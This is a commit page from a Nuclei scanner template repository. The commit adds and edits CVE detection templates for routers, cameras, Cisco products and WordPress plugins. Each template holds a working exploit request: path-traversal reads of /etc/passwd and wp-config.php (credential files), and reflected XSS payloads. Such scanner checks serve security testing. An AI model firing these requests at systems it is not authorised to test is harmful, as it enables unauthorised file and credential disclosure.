daffainfo
/
my-nuclei-templates
mirror of https://github.com/daffainfo/my-nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Adding new templates (8.4.2)

main
daffainfo 2021-07-27 07:25:17 +07:00
parent 22df30d514
commit 313ccd41aa
29 changed files with 559 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
CVE-2009-1558.yaml
View File

@ -17,7 +17,7 @@ requests:
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- "root:.*:0:0"
- type: status
status:

26
CVE-2010-2307.yaml Executable file
View File

@ -0,0 +1,26 @@
id: CVE-2010-2307
info:
name: Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request.
reference: |
- https://www.securityfocus.com/bid/40550/info
- https://nvd.nist.gov/vuln/detail/CVE-2010-2307
tags: cve,cve2010,iot,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

26
CVE-2010-4231.yaml Executable file
View File

@ -0,0 +1,26 @@
id: CVE-2010-4231
info:
name: Camtron CMNC-200 IP Camera - Directory Traversal
author: daffainfo
severity: high
description: The CMNC-200 IP Camera has a built-in web server that is enabled by default. The server is vulnerable to directory transversal attacks, allowing access to any file on the camera file system.
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2010-4231
- https://www.exploit-db.com/exploits/15505
tags: cve,cve2010,iot,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

2
CVE-2011-1669.yaml
View File

@ -20,7 +20,7 @@ requests:
- type: regex
regex:
- "root:[x*]:0:0"
- "root:.*:0:0"
- type: status
status:

25
CVE-2011-3315.yaml Executable file
View File

@ -0,0 +1,25 @@
id: CVE-2011-3315
info:
name: Cisco CUCM, UCCX, and Unified IP-IVR- Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in Cisco Unified Communications Manager (CUCM) 5.x and 6.x before 6.1(5)SU2, 7.x before 7.1(5b)SU2, and 8.x before 8.0(3), and Cisco Unified Contact Center Express (aka Unified CCX or UCCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) before 6.0(1)SR1ES8, 7.0(x) before 7.0(2)ES1, 8.0(x) through 8.0(2)SU3, and 8.5(x) before 8.5(1)SU2, allows remote attackers to read arbitrary files via a crafted URL, aka Bug IDs CSCth09343 and CSCts44049.
reference: https://www.exploit-db.com/exploits/36256
tags: cve,cve2011,lfi,cisco
requests:
- method: GET
path:
- "{{BaseURL}}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

32
CVE-2012-4889.yaml Executable file
View File

@ -0,0 +1,32 @@
id: CVE-2012-4889
info:
name: ManageEngine Firewall Analyzer 7.2 - Reflected Cross Site Scripting (XSS)
author: daffainfo
severity: medium
description: Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do.
reference: |
- https://www.securityfocus.com/bid/52841/info
- https://nvd.nist.gov/vuln/detail/CVE-2012-4889
tags: cve,cve2012,xss,manageengine
requests:
- method: GET
path:
- "{{BaseURL}}/fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

25
CVE-2013-5528.yaml Executable file
View File

@ -0,0 +1,25 @@
id: CVE-2013-5528
info:
name: Cisco Unified Communications Manager 7/8/9 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815
reference: https://www.exploit-db.com/exploits/40887
tags: cve,cve2013,lfi,cisco
requests:
- method: GET
path:
- "{{BaseURL}}/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

31
CVE-2013-7240.yaml Executable file
View File

@ -0,0 +1,31 @@
id: CVE-2013-7240
info:
name: WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.
reference: |
- https://www.exploit-db.com/exploits/38936
- https://nvd.nist.gov/vuln/detail/CVE-2013-7240
tags: cve,cve2013,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
- "DB_HOST"
- "The base configurations of the WordPress"
part: body
condition: and
- type: status
status:
- 200

25
CVE-2014-2962.yaml Executable file
View File

@ -0,0 +1,25 @@
id: CVE-2014-2962
info:
name: Belkin N150 Router 1.00.08/1.00.09 - Directory Traversal
author: daffainfo
severity: high
description: Path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter.
reference: https://www.exploit-db.com/exploits/38488
tags: cve,cve2014,lfi,router
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

24
CVE-2014-6308.yaml Executable file
View File

@ -0,0 +1,24 @@
id: CVE-2014-6308
info:
name: Osclass Security Advisory 3.4.1 - Local File Inclusion
author: daffainfo
severity: high
reference: https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html
tags: cve,cve2014,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

2
CVE-2015-1000012.yaml
View File

@ -18,7 +18,7 @@ requests:
matchers:
- type: regex
regex:
- "root:[0*]:0:0"
- "root:.*:0:0"
part: body
- type: status
status:

2
CVE-2015-9480.yaml
View File

@ -18,7 +18,7 @@ requests:
matchers:
- type: regex
regex:
- "root:[0*]:0:0"
- "root:.*:0:0"
part: body
- type: status
status:

29
CVE-2016-1000126.yaml Executable file
View File

@ -0,0 +1,29 @@
id: CVE-2016-1000126
info:
name: Admin Font Editor <= 1.8 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000126
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
CVE-2016-1000127.yaml Executable file
View File

@ -0,0 +1,30 @@
id: CVE-2016-1000127
info:
name: AJAX Random Post <= 2.00 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Reflected XSS in wordpress plugin ajax-random-post v2.00
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000127
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
CVE-2016-1000137.yaml Executable file
View File

@ -0,0 +1,29 @@
id: CVE-2016-1000137
info:
name: Hero Maps Pro 2.1.0 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=658
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
CVE-2016-1000138.yaml Executable file
View File

@ -0,0 +1,29 @@
id: CVE-2016-1000138
info:
name: Admin Font Editor <= 1.8 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=38
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
CVE-2016-1000140.yaml Executable file
View File

@ -0,0 +1,29 @@
id: CVE-2016-1000140
info:
name: New Year Firework <= 1.1.9 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000140
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
CVE-2016-1000152.yaml Executable file
View File

@ -0,0 +1,30 @@
id: CVE-2016-1000152
info:
name: Tidio-form <= 1.0 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Reflected XSS in wordpress plugin tidio-form v1.0
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000152
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
CVE-2016-1000154.yaml Executable file
View File

@ -0,0 +1,30 @@
id: CVE-2016-1000154
info:
name: WHIZZ <= 1.0.7 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Reflected XSS in wordpress plugin whizz v1.0.
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000154
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

2
CVE-2016-10956.yaml
View File

@ -18,7 +18,7 @@ requests:
matchers:
- type: regex
regex:
- "root:[0*]:0:0"
- "root:.*:0:0"
part: body
- type: status
status:

27
CVE-2018-10822.yaml Executable file
View File

@ -0,0 +1,27 @@
id: CVE-2018-10822
info:
name: D-Link Routers - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after “GET /uir” in an HTTP request.
reference: |
- https://www.exploit-db.com/exploits/45678
- https://nvd.nist.gov/vuln/detail/CVE-2018-10822
tags: cve,cve2018,lfi,router,dlink
requests:
- method: GET
path:
- "{{BaseURL}}/uir//etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

2
CVE-2018-12031.yaml
View File

@ -21,7 +21,7 @@ requests:
matchers:
- type: regex
regex:
- "root:[0*]:0:0"
- "root:.*:0:0"
- "\\[(font|extension|file)s\\]"
condition: or
part: body

2
CVE-2018-16059.yaml
View File

@ -19,7 +19,7 @@ requests:
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- "root:.*:0:0"
part: body
- type: status

31
CVE-2018-20985.yaml Executable file
View File

@ -0,0 +1,31 @@
id: CVE-2018-20985
info:
name: WordPress Plugin WP Payeezy Pay 2.97 - Local File Inclusion
author: daffainfo
description: WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected.
reference: |
- https://www.pluginvulnerabilities.com/2018/12/06/our-improved-proactive-monitoring-has-now-caught-a-local-file-inclusion-lfi-vulnerability-as-well/
- https://www.cvedetails.com/cve/CVE-2018-20985/
severity: high
tags: cve,cve2018,wordpress,lfi
requests:
- method: POST
path:
- "{{BaseURL}}/wp-content/plugins/wp-payeezy-pay/donate.php"
body: "x_login=../../../wp-config"
matchers-condition: and
matchers:
- type: word
words:
- "The base configuration for WordPress"
- "define( 'DB_NAME',"
- "define( 'DB_PASSWORD',"
condition: and
part: body
- type: status
status:
- 200

2
CVE-2019-15713.yaml
View File

@ -2,7 +2,7 @@ id: CVE-2019-15713
info:
name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
author: daffainfo,dhiyaneshDk
severity: medium
description: Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site.
reference: |

2
CVE-2019-9618.yaml
View File

@ -20,7 +20,7 @@ requests:
- type: regex
regex:
- "root:[x*]:0:0"
- "root:.*:0:0"
- type: status
status:

25
CVE-2020-29227.yaml Executable file
View File

@ -0,0 +1,25 @@
id: CVE-2020-29227
info:
name: Car Rental Management System 1.0 - Local File Inclusion (LFI)
author: daffainfo
severity: high
description: An issue was discovered in Car Rental Management System 1.0. An unauthenticated user can perform a file inclusion attack against the /index.php file with a partial filename in the "page" parameter, to cause local file inclusion resulting in code execution.
reference: |
- https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5
- https://nvd.nist.gov/vuln/detail/CVE-2020-29227
tags: cve,cve2020,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?page=/etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
part: body
- type: status
status:
- 200

20
CVE-2020-35580.yaml Executable file
View File

@ -0,0 +1,20 @@
id: CVE-2020-35580
info:
name: SearchBlox < 9.2.2 - Local File Inclusion (LFI)
author: daffainfo
severity: high
description: Local File Inclusion vulnerability in the FileServlet in all SearchBlox before 9.2.2 allows remote, unauthenticated users to read arbitrary files from the operating system via a /searchblox/servlet/FileServlet?col=url= request. Additionally, this may be used to read the contents of the SearchBlox configuration file (e.g., searchblox/WEB-INF/config.xml), which contains both the Super Admin API key and the base64 encoded SHA1 password hashes of other SearchBlox users.
reference: https://hateshape.github.io/general/2021/05/11/CVE-2020-35580.html
tags: cve,cve2020,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/searchblox/servlet/FileServlet?col=9&url=/etc/passwd"
matchers:
- type: regex
regex:
- "root:.*:0:0"
part: body

27
CVE-2021-23241.yaml Executable file
View File

@ -0,0 +1,27 @@
id: CVE-2021-23241
info:
name: Mercury Router Web Server Directory Traversal
author: daffainfo
severity: medium
description: MERCUSYS Mercury X18G 1.0.5 devices allow Directory Traversal via ../ in conjunction with a loginLess or login.htm URI (for authentication bypass) to the web server, as demonstrated by the /loginLess/../../etc/passwd URI.
reference: |
- https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-23241
tags: cve,cve2021,iot,lfi,router
requests:
- method: GET
path:
- "{{BaseURL}}/loginLess/../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
part: body
- type: status
status:
- 200